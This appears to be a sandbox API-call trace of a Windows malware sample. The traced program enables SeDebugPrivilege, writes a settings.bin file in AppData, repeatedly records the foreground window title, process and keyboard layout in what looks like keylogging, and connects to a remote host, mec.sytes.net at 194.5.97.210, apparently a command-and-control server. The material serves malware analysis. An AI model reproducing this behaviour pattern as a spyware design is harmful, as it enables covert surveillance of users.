[0209.241] WaitMessage () returned 1
[0216.684] PeekMessageW (lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0)
[0216.685] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1
[0216.686] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1
[0219.332] GetCurrentProcess () returned 0xffffffff
[0219.332] GetLastError () returned 0x0
[0219.332] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19eaa4 | out: TokenHandle=0x19eaa4*=0x434) returned 1
[0219.333] GetLastError () returned 0x0
[0219.333] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ea9c | out: lpLuid=0x19ea9c*(LowPart=0x14, HighPart=0)) returned 1
[0219.336] GetLastError () returned 0x0
[0219.336] AdjustTokenPrivileges (in: TokenHandle=0x434, DisableAllPrivileges=0, NewState=0x25b74cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0219.336] GetLastError () returned 0x0
[0219.336] CloseHandle (hObject=0x434) returned 1
[0219.336] GetLastError () returned 0x0
[0219.341] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x1d, ProcessInformation=0x19eae0, ProcessInformationLength=0x4) returned 0x0
[0219.341] GetCurrentProcess () returned 0xffffffff
[0219.341] GetLastError () returned 0x0
[0219.341] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19eaa4 | out: TokenHandle=0x19eaa4*=0x434) returned 1
[0219.341] GetLastError () returned 0x0
[0219.341] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ea9c | out: lpLuid=0x19ea9c*(LowPart=0x14, HighPart=0)) returned 1
[0219.342] GetLastError () returned 0x0
[0219.342] AdjustTokenPrivileges (in: TokenHandle=0x434, DisableAllPrivileges=0, NewState=0x25b74e4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0219.342] GetLastError () returned 0x0
[0219.342] CloseHandle (hObject=0x434) returned 1
[0219.343] GetLastError () returned 0x0
[0219.738] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0219.738] GetLastError () returned 0x0
[0219.739] SetErrorMode (uMode=0x1) returned 0x0
[0219.739] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x19ea74 | out: lpFileInformation=0x19ea74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0219.739] GetLastError () returned 0x2
[0219.739] SetErrorMode (uMode=0x0) returned 0x1
[0219.740] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0219.740] GetLastError () returned 0x2
[0219.740] SetErrorMode (uMode=0x1) returned 0x0
[0219.740] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x434
[0219.742] GetLastError () returned 0x0
[0219.742] GetFileType (hFile=0x434) returned 0x1
[0219.742] SetErrorMode (uMode=0x0) returned 0x1
[0219.742] GetFileType (hFile=0x434) returned 0x1
[0219.742] WriteFile (in: hFile=0x434, lpBuffer=0x25b8488*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19ea04, lpOverlapped=0x0 | out: lpBuffer=0x25b8488*, lpNumberOfBytesWritten=0x19ea04*=0x8, lpOverlapped=0x0) returned 1
[0219.744] GetLastError () returned 0x0
[0219.744] CloseHandle (hObject=0x434) returned 1
[0219.750] GetLastError () returned 0x0
[0219.750] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", nBufferLength=0x105, lpBuffer=0x19e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", lpFilePart=0x0) returned 0x57
[0219.750] GetLastError () returned 0x0
[0219.751] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bak")) returned 0
[0219.751] GetLastError () returned 0x2
[0219.777] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.777] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.778] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.780] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0219.782] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x6, wParam=0x1, lParam=0x0) returned 0x0
[0219.802] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0219.819] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x6, wParam=0x0, lParam=0x0) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0
[0219.821] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0
[0219.822] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0
[0219.822] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x3b, wParam=0x50c, lParam=0x0)
[0219.823] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0
[0219.823] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0
[0220.093] DestroyCursor (hCursor=0x901ab) returned 1
[0220.094] GetLastError () returned 0x0
[0221.293] GetWindowLongW (hWnd=0x4024a, nIndex=-20) returned 65792
[0221.299] DestroyWindow (hWnd=0x4024a)
[0221.299] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0221.361] PostThreadMessageW (idThread=0xce0, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
[0221.363] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0221.663] GetLastError () returned 0x7f
[0221.671] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0221.675] DestroyWindow (hWnd=0x801e2)
[0221.676] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0221.676] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0221.677] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
Thread:
id = 106
os_tid = 0x1344
Thread:
id = 109
os_tid = 0x960
Thread:
id = 110
os_tid = 0x133c
[0197.865] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.777] RegCloseKey (hKey=0x2d8) returned 0x0
[0204.777] LocalFree (hMem=0x685a98) returned 0x0
[0204.777] GetLastError () returned 0x0
[0204.778] LocalFree (hMem=0x685928) returned 0x0
[0204.778] GetLastError () returned 0x0
[0204.778] CloseHandle (hObject=0x2dc) returned 1
[0204.778] GetLastError () returned 0x0
[0208.832] CloseHandle (hObject=0x404) returned 1
[0208.832] GetLastError () returned 0x0
[0208.833] CloseHandle (hObject=0x408) returned 1
[0208.833] GetLastError () returned 0x0
[0208.833] CloseHandle (hObject=0x414) returned 1
[0208.833] GetLastError () returned 0x0
[0208.834] CloseHandle (hObject=0x410) returned 1
[0208.834] GetLastError () returned 0x0
[0208.834] CloseHandle (hObject=0x3fc) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x41c) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x418) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x40c) returned 1
[0208.836] GetLastError () returned 0x0
[0213.690] CloseHandle (hObject=0x410) returned 1
[0213.697] GetLastError () returned 0x0
[0213.700] CloseHandle (hObject=0x434) returned 1
[0213.700] GetLastError () returned 0x0
Thread:
id = 111
os_tid = 0xf5c
[0203.850] CoGetContextToken (in: pToken=0x507fde8 | out: pToken=0x507fde8) returned 0x0
[0203.851] CObjectContext::QueryInterface () returned 0x0
[0203.851] CObjectContext::GetCurrentThreadType () returned 0x0
[0203.851] Release () returned 0x0
[0203.851] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 112
os_tid = 0x290
[0203.910] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.164] GetForegroundWindow () returned 0x2007c
[0204.234] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0204.241] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x51cf1ec | out: lpLuid=0x51cf1ec*(LowPart=0x14, HighPart=0)) returned 1
[0204.247] GetLastError () returned 0x0
[0204.248] GetCurrentProcess () returned 0xffffffff
[0204.248] GetLastError () returned 0x0
[0204.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x51cf1e8 | out: TokenHandle=0x51cf1e8*=0x384) returned 1
[0204.250] GetLastError () returned 0x0
[0204.301] AdjustTokenPrivileges (in: TokenHandle=0x384, DisableAllPrivileges=0, NewState=0x24d8e2c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0204.301] GetLastError () returned 0x0
[0204.303] CloseHandle (hObject=0x384) returned 1
[0204.303] GetLastError () returned 0x0
[0204.520] EnumProcesses (in: lpidProcess=0x24da290, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x24da290, lpcbNeeded=0x51cf97c) returned 1
[0204.545] GetLastError () returned 0x0
[0204.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8b0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x34ee8b0, ResultLength=0x51cf940*=0x17520) returned 0x0
[0204.592] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0204.598] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.170] GetForegroundWindow () returned 0x2007c
[0205.171] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.324] GetForegroundWindow () returned 0x2007c
[0205.324] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0205.324] EnumProcesses (in: lpidProcess=0x2507b5c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2507b5c, lpcbNeeded=0x51cf97c) returned 1
[0205.331] GetLastError () returned 0x0
[0205.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x350e8c0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x350e8c0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0205.340] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0205.340] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.494] GetForegroundWindow () returned 0x2007c
[0205.494] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.830] GetForegroundWindow () returned 0x100d4
[0205.830] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0205.830] EnumProcesses (in: lpidProcess=0x2543c7c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2543c7c, lpcbNeeded=0x51cf97c) returned 1
[0205.837] GetLastError () returned 0x0
[0205.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x352e8e0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x352e8e0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0205.849] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0205.849] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0206.059] GetForegroundWindow () returned 0x2007c
[0206.059] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0206.297] GetForegroundWindow () returned 0x2007c
[0206.297] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0206.648] GetForegroundWindow () returned 0x2007c
[0206.648] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0206.650] EnumProcesses (in: lpidProcess=0x25c5df4, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x25c5df4, lpcbNeeded=0x51cf97c) returned 1
[0206.729] GetLastError () returned 0x0
[0206.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x358eb60, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x358eb60, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0207.019] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0207.055] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.202] GetForegroundWindow () returned 0x2007c
[0207.202] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.439] GetForegroundWindow () returned 0x100d4
[0207.439] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0207.440] EnumProcesses (in: lpidProcess=0x25f065c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x25f065c, lpcbNeeded=0x51cf97c) returned 1
[0207.468] GetLastError () returned 0x0
[0207.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35aeb80, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x35aeb80, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0207.669] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0207.670] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0207.811] GetForegroundWindow () returned 0x2007c
[0207.811] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.967] GetForegroundWindow () returned 0x2007c
[0207.968] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.185] GetForegroundWindow () returned 0x2007c
[0208.185] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0208.195] EnumProcesses (in: lpidProcess=0x26635fc, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x26635fc, lpcbNeeded=0x51cf97c) returned 1
[0208.203] GetLastError () returned 0x0
[0208.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x360ebe0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x360ebe0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.246] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0208.255] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.462] GetForegroundWindow () returned 0x2007c
[0208.463] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.734] GetForegroundWindow () returned 0x100d4
[0208.734] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0208.735] EnumProcesses (in: lpidProcess=0x2693df8, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2693df8, lpcbNeeded=0x51cf97c) returned 1
[0208.758] GetLastError () returned 0x0
[0208.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x362fc10, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x362fc10, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.844] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.845] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0208.848] GetForegroundWindow () returned 0x2007c
[0208.848] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0208.848] EnumProcesses (in: lpidProcess=0x250fcb4, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x250fcb4, lpcbNeeded=0x51cf97c) returned 1
[0208.917] GetLastError () returned 0x0
[0208.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x364fc30, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x364fc30, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.927] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0208.927] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0209.029] GetForegroundWindow () returned 0x2007c
[0209.029] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0209.030] EnumProcesses (in: lpidProcess=0x255fc28, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x255fc28, lpcbNeeded=0x51cf97c) returned 1
[0209.032] GetLastError () returned 0x0
[0209.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x368fc70, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x368fc70, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0209.041] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0209.041] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0210.157] DnsQuery_A (in: pszName="mec.sytes.net", wType=0x1, Options=0x48, pExtra=0x6979b8, ppQueryResults=0x51cfa10, pReserved=0x51cf9f0 | out: pExtra=0x6979b8, ppQueryResults=0x51cfa10*(pNext=0x0, pName="mec.sytes.net", wType=0x1, wDataLength=0x4, Flags=0x2019, dwTtl=0xf, dwReserved=0x1, Data=0x6afbc0*(IpAddress="194.5.97.210")), pReserved=0x51cf9f0*=0x0) returned 0x0
[0210.801] GetCurrentProcess () returned 0xffffffff
[0210.801] GetLastError () returned 0x3f0
[0210.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce36c | out: TokenHandle=0x51ce36c*=0x410) returned 1
[0210.801] GetLastError () returned 0x3f0
[0211.238] GetCurrentProcess () returned 0xffffffff
[0211.238] GetLastError () returned 0x3f0
[0211.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce37c | out: TokenHandle=0x51ce37c*=0x434) returned 1
[0211.238] GetLastError () returned 0x3f0
[0211.411] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438
[0211.412] GetLastError () returned 0x0
[0211.445] setsockopt (s=0x438, level=65535, optname=128, optval="\x01", optlen=4) returned 0
[0211.445] GetLastError () returned 0x0
[0211.692] bind (s=0x438, addr=0x25fceb8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
[0211.694] GetLastError () returned 0x0
[0211.707] WSAIoctl (in: s=0x438, dwIoControlCode=0xc8000006, lpvInBuffer=0x51cf930, cbInBuffer=0x10, lpvOutBuffer=0x51cf944, cbOutBuffer=0x4, lpcbBytesReturned=0x51cf940, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51cf944, lpcbBytesReturned=0x51cf940, lpOverlapped=0x0) returned 0
[0211.708] GetLastError () returned 0x0
[0211.783] ConnectEx (in: s=0x438, name=0x25fcd40*(sa_family=2, sin_port=0xcbb, sin_addr="194.5.97.210"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x51cf994, lpOverlapped=0x2585ca4 | out: lpdwBytesSent=0x51cf994*=0x0) returned 0
[0211.930] GetForegroundWindow () returned 0x2007c
[0211.930] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.052] GetForegroundWindow () returned 0x2007c
[0212.052] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.191] GetForegroundWindow () returned 0x100d4
[0212.192] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0212.192] EnumProcesses (in: lpidProcess=0x2623660, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2623660, lpcbNeeded=0x51cf97c) returned 1
[0212.214] GetLastError () returned 0x3e5
[0212.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x374fd30, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x374fd30, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0212.255] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0212.256] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0212.337] GetForegroundWindow () returned 0x2007c
[0212.337] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0212.337] EnumProcesses (in: lpidProcess=0x2649078, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2649078, lpcbNeeded=0x51cf97c) returned 1
[0212.347] GetLastError () returned 0x3e5
[0212.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x376fd50, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x376fd50, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0212.384] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0212.385] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.542] GetForegroundWindow () returned 0x2007c
[0212.542] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.663] GetForegroundWindow () returned 0x2007c
[0212.663] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.792] GetForegroundWindow () returned 0x2007c
[0212.792] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.990] GetForegroundWindow () returned 0x100d4
[0212.990] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0212.990] EnumProcesses (in: lpidProcess=0x266f8d8, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x266f8d8, lpcbNeeded=0x51cf97c) returned 1
[0212.997] GetLastError () returned 0x3e5
[0212.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x378fd70, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x378fd70, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0213.008] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0213.008] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.135] GetForegroundWindow () returned 0x2007c
[0213.135] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0213.135] EnumProcesses (in: lpidProcess=0x26954ec, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x26954ec, lpcbNeeded=0x51cf97c) returned 1
[0213.146] GetLastError () returned 0x3e5
[0213.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x37afd90, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x37afd90, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0213.161] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0213.162] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.272] GetForegroundWindow () returned 0x2007c
[0213.272] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.397] GetForegroundWindow () returned 0x2007c
[0213.398] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0213.531] GetForegroundWindow () returned 0x2007c
[0213.531] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
